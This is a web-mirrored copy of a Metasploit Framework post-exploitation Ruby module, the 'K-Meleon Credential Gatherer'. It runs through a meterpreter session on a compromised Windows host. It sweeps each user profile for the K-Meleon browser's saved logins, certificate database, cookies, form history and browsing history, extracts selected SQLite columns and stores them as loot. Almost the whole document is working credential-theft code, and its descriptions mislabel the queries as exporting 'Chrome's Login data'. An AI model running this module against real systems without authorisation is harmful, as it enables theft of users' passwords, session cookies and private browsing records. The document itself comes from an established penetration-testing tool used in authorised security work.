Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/kmeleon.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::File

9
  include Msf::Post::Windows::UserProfiles

10
  include Msf::Post::Windows::Packrat

11


12
  ARTIFACTS =

13
    {

14
      application: 'k-meleon',

15
      app_category: 'browsers',

16
      gatherable_artifacts: [

17
        {

18
          filetypes: 'logins',

19
          path: 'AppData',

20
          dir: 'K-Meleon',

21
          artifact_file_name: 'signons.sqlite',

22
          description: "K-Meleon's saved Username and Passwords",

23
          credential_type: 'sqlite',

24
          sql_search: [

25
            {

26
              sql_description: "Database Commands which exports Chrome's Login data",

27
              sql_table: 'logins',

28
              sql_column: 'username_value, action_url'

29
            }

30
          ]

31
        },

32
        {

33
          filetypes: 'logins',

34
          path: 'AppData',

35
          dir: 'K-Meleon',

36
          artifact_file_name: 'cert8.db',

37
          description: "K-Meleon's saved Username and Passwords",

38
          credential_type: 'database'

39
        },

40
        {

41
          filetypes: 'cookies',

42
          path: 'AppData',

43
          dir: 'K-Meleon',

44
          artifact_file_name: 'cookies.sqlite',

45
          description: "K-Meleon's Cookies",

46
          credential_type: 'sqlite',

47
          sql_search: [

48
            {

49
              sql_description: "Database Commands which exports Chrome's Login data",

50
              sql_table: 'moz_cookies',

51
              sql_column: 'baseDomain, host, name, path, value'

52
            }

53
          ]

54
        },

55
        {

56
          filetypes: 'web_history',

57
          path: 'AppData',

58
          dir: 'K-Meleon',

59
          artifact_file_name: 'formhistory.sqlite',

60
          description: "K-Meleon's Visited websites ",

61
          credential_type: 'sqlite',

62
          sql_search: [

63
            {

64
              sql_description: "Database Commands which exports Chrome's Login data",

65
              sql_table: 'moz_formhistory',

66
              sql_column: 'value'

67
            }

68
          ]

69
        },

70
        {

71
          filetypes: 'web_history',

72
          path: 'AppData',

73
          dir: 'K-Meleon',

74
          artifact_file_name: 'places.sqlite',

75
          description: "K-Meleon's Visited websites ",

76
          credential_type: 'sqlite',

77
          sql_search: [

78
            {

79
              sql_description: "Database Commands which exports Chrome's Login data",

80
              sql_table: 'moz_places',

81
              sql_column: 'url'

82
            },

83
            {

84
              sql_description: "Database Commands which exports Chrome's Login data",

85
              sql_table: 'moz_inputhistory',

86
              sql_column: 'input'

87
            },

88
            {

89
              sql_description: "Database Commands which exports Chrome's Login data",

90
              sql_table: 'moz_hosts',

91
              sql_column: 'host'

92
            },

93
            {

94
              sql_description: "Database Commands which exports Chrome's Login data",

95
              sql_table: 'moz_keywords',

96
              sql_column: 'keyword'

97
            }

98
          ]

99
        }

100
      ]

101
    }.freeze

102


103
  def initialize(info = {})

104
    super(

105
      update_info(

106
        info,

107
        'Name' => 'K-Meleon Credential Gatherer',

108
        'Description' => %q{

109
          This module searches for K-Meleon credentials on a Windows host.

110
        },

111
        'License' => MSF_LICENSE,

112
        'Author' => [

113
          'Kazuyoshi Maruta',

114
          'Daniel Hallsworth',

115
          'Barwar Salim M',

116
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org

117
        ],

118
        'Platform' => ['win'],

119
        'SessionTypes' => ['meterpreter'],

120
        'Notes' => {

121
          'Stability' => [CRASH_SAFE],

122
          'Reliability' => [],

123
          'SideEffects' => []

124
        }

125
      )

126
    )

127


128
    register_options(

129
      [

130
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

131
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

132
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

133
        # enumerates the options based on the artifacts that are defined below

134
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

135
      ]

136
    )

137
  end

138


139
  def run

140
    print_status('Filtering based on these selections:  ')

141
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

142
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

143
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

144


145
    # used to grab files for each user on the remote host

146
    grab_user_profiles.each do |userprofile|

147
      run_packrat(userprofile, ARTIFACTS)

148
    end

149


150
    print_status 'PackRat credential sweep completed'

151
  end

152
end

153


154